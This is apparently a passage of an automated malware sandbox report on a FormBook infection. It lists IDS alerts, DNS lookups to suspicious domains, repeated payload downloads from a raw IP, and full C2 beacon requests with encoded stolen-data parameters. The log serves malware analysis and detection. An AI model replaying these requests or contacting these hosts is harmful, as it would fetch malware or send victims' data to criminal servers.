                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58108 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:52480 -> 157.112.187.77:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:52486 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58112 -> 111.119.219.195:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58117 -> 172.67.148.163:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58106 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58101 -> 134.122.135.54:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58091 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:52481 -> 157.112.187.77:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:52483 -> 8.222.228.107:80
                      Performs DNS queries to domains with low reputation
                      Source: DNS query: www.lenzor.xyz
                      Source: DNS query: www.031233720.xyz
                      Source: DNS query: www.dualbitcoin.xyz
                      Source: DNS query: www.ethereumkeeper.xyz
                      Source: DNS query: www.moonavatar.xyz
                      Source: DNS query: www.blogkart4u.xyz
                      Source: DNS query: www.splogi.xyz
                      Source: DNS query: www.splogi.xyz
                      Source: DNS query: www.splogi.xyz
                      Source: global trafficTCP traffic: 192.168.2.9:58070 -> 162.159.36.2:53
                      Source: global trafficHTTP traffic detected: GET /win32/panel/uploads/Rymwg.wav HTTP/1.1Host: 196.251.83.222Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /win32/panel/uploads/Rymwg.wav HTTP/1.1Host: 196.251.83.222Connection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 8.222.228.107 8.222.228.107
                      Source: Joe Sandbox ViewIP Address: 157.112.187.77 157.112.187.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: global trafficHTTP traffic detected: GET /win32/panel/uploads/Rymwg.wav HTTP/1.1Host: 196.251.83.222Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /win32/panel/uploads/Rymwg.wav HTTP/1.1Host: 196.251.83.222Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /0pv3/?r2Q4K=X6iHrToHPpvPuDL&SxYDlTI=I6G8DBRKF3PN9Cy5HjggG2ycZCNyM0JG3kSPGuvbR5esC8dJu2EfwhpJJLd7FYxSNzCiq9OPGq3cAsVzLwaIQ6ylJ364WZTs0FaVS9XcmM1ou89sIg== HTTP/1.1Host: www.crosspatches.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /ynw5/?SxYDlTI=ZF/ThatktxT4IEpwfKsUOyQVHh5nHqomFNyY5ir4FklXSfOpwm6EfqJ4jyoelDA7A+pvc8dOI9DtdfL88IP+l0CMldoMJ0m7ZXAsHIbwHSoXpSc05g==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.quo1ybjmkhdqljoz.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /pknc/?r2Q4K=X6iHrToHPpvPuDL&SxYDlTI=TsWT+PVJyweInpctzthQVdxTMr7Q3Mb2cuEH07dFoI07yBLnimF2DBYyoUH276N8oHesXX9azD5G5u0ynw8eWVvznNe+xiZhR1H5gqyKKaFxIDyX/g== HTTP/1.1Host: www.lenzor.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /hxn2/?SxYDlTI=ZV/imptMlgE5kVt692kkoOOnpYQNqGQCFmm/TGgbqnHG1mgu4lPPJ2KHb3Eys5m88oXnT1AcDhAihVQlrO8FE1FC2KR6ZjObRyGnHzUzw9P3InsxcQ==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.warc.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /qxo2/?SxYDlTI=o8DmqPI+VqVvnj/lu1ZpZtXdZr7bSrN2dVm8WOSQKn+kpW+rBJORjMlPia6OnGwbOFqdqYTBcx/hOJb3c+Na6fb6BqcWfXFzZMIQLYGCibvw2DUwkQ==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.dualbitcoin.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /shtf/?SxYDlTI=FhU37QPUjXoDR/mkORBYEbzjzv1Jdaom3Ft3Wddglnt/yj+EbctenxscC0kIxMOxkZk08U8HpLn+XILh76EKPRQYLSPadHv3H7HjHVpD4Cu6rC7cHg==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.lifce.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /qkhv/?SxYDlTI=i51Ixu4M5LOvjs5atst6QhQmAxFvlGpFEg8Yva/DYuN1L4sxQPD0gcYXROip4eIGKLRWO2x5MCzKIlk6eYaznVU8x6VfWmgC4v2krpA400j5pgNyuA==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.2y0uoqwoohvdf5vd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /gu37/?SxYDlTI=iOl0XSH5CDMOf+V9HZ+UKaCE6FMs6uPW7cxb7UU6mqRal+VgoP4cf7GVxAN/lcjotRpWXcIGUQ8s/QpRPpBCk84lHlvoLiS5CPoEo/g3opO5cXnLfw==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.ethereumkeeper.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /36cg/?SxYDlTI=c6lcAlso4cwdWdj8OmW47AtI274xiSR94bq7w+xrmdROEAiOB56qTuKvZNoCgSLBfC/6u7yUdjQUAHkJ36WqywahPdu8dbqHF6CFfcf9pvxXrPYJYw==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.blogkart4u.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /4w1v/?SxYDlTI=XpAG9fe2pLhJKmhZ85et2/QP5MtwFiP0J2u6NTgZVwSRoaiRiOX3KjlWgf7AqOqvMoNp5Q5VLCDsww+9yNorpihl81wEc1DKnMsuEV6CLBWysIWFlg==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.xiongding.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /hlq7/?SxYDlTI=dKN4O6z/N4DapGrcMOyrOAnbRVSrFobPG5RCVPQvSrMdLQWk1/Pc73VtQKyrUXqHVsljfksdfGpNujtuX/Zs4AXe6Whgc1+2+Qk0q5X0NORqkrazJw==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.savposalore.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /ti21/?SxYDlTI=WGxoXqct8zJEPhtv7hvcADdTxPrqYVBaAgo9WLM116GuHzjz/IohiFqyzVfMSqM9DJaG8JlLLxRiginV+PkmpC/AwSD2S6jQ6R3uH2YrrVFlkkvWRg==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.splogi.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /pzq1/?SxYDlTI=oDRqyMa6fuBuz7WmYIBwRJUpV6l9q4FTd5aLt2B5ybsFCSl98v1LZFy0dWfSbHe14Kep4ozyTwqi5TiZwq01Evz5suQx1WD3JzmH418CXViW0yuCBw==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.knowesis.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /j64s/?SxYDlTI=EoY4h0UyAqkEWvzM9EA/7w4uqd0YPBtkD+z/1eOQyjkeiCosMlbYcdVAn/lmFNVY6HN81TLliXNwIu9yWC9x+RZjnwIkA71MomnPOqT//9nU4EDo/Q==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.jingdongpt.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                      Source: global trafficDNS traffic detected: DNS query: www.crosspatches.info
                      Source: global trafficDNS traffic detected: DNS query: www.quo1ybjmkhdqljoz.top
                      Source: global trafficDNS traffic detected: DNS query: www.lenzor.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.warc.tech
                      Source: global trafficDNS traffic detected: DNS query: www.031233720.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.dualbitcoin.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.lifce.life
                      Source: global trafficDNS traffic detected: DNS query: www.2y0uoqwoohvdf5vd.top
                      Source: global trafficDNS traffic detected: DNS query: www.ethereumkeeper.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.moonavatar.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.blogkart4u.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.xiongding.tech
                      Source: global trafficDNS traffic detected: DNS query: www.savposalore.shop
                      Source: global trafficDNS traffic detected: DNS query: www.splogi.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.knowesis.app
                      Source: global trafficDNS traffic detected: DNS query: www.jingdongpt.shop
                      Source: unknownHTTP traffic detected: POST /ynw5/ HTTP/1.1Host: www.quo1ybjmkhdqljoz.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.quo1ybjmkhdqljoz.topReferer: http://www.quo1ybjmkhdqljoz.top/ynw5/Connection: closeCache-Control: no-cacheContent-Length: 196Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1Data Raw: 53 78 59 44 6c 54 49 3d 55 48 58 7a 69 74 35 69 68 6d 6e 75 56 45 64 6d 57 71 6f 47 48 51 30 58 4d 6a 70 55 53 66 4d 72 48 50 71 38 77 43 7a 4e 49 56 78 43 52 74 66 75 36 55 33 36 51 76 59 65 6e 54 74 67 73 68 6f 4e 49 63 70 64 59 38 5a 56 51 4e 79 52 66 76 4c 2b 33 38 65 2f 6a 30 6d 39 70 74 46 78 59 52 62 57 66 6d 6f 36 44 50 61 4a 4c 48 6b 61 6b 46 77 49 6f 2f 78 50 75 57 47 7a 34 6f 33 6b 48 73 6f 64 65 6f 67 65 64 66 56 35 48 69 63 45 62 63 42 79 32 61 79 74 33 53 50 4a 36 49 7a 6d 57 58 4b 65 48 73 49 36 39 6d 51 2b 58 6f 71 68 48 51 51 65 58 65 30 31 69 36 4c 5a 78 2b 72 50 Data Ascii: SxYDlTI=UHXzit5ihmnuVEdmWqoGHQ0XMjpUSfMrHPq8wCzNIVxCRtfu6U36QvYenTtgshoNIcpdY8ZVQNyRfvL+38e/j0m9ptFxYRbWfmo6DPaJLHkakFwIo/xPuWGz4o3kHsodeogedfV5HicEbcBy2ayt3SPJ6IzmWXKeHsI69mQ+XoqhHQQeXe01i6LZx+rP
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 08:11:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 08:11:54 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 08:11:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 08:11:59 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Tue, 11 Mar 2025 08:12:06 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Tue, 11 Mar 2025 08:12:08 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
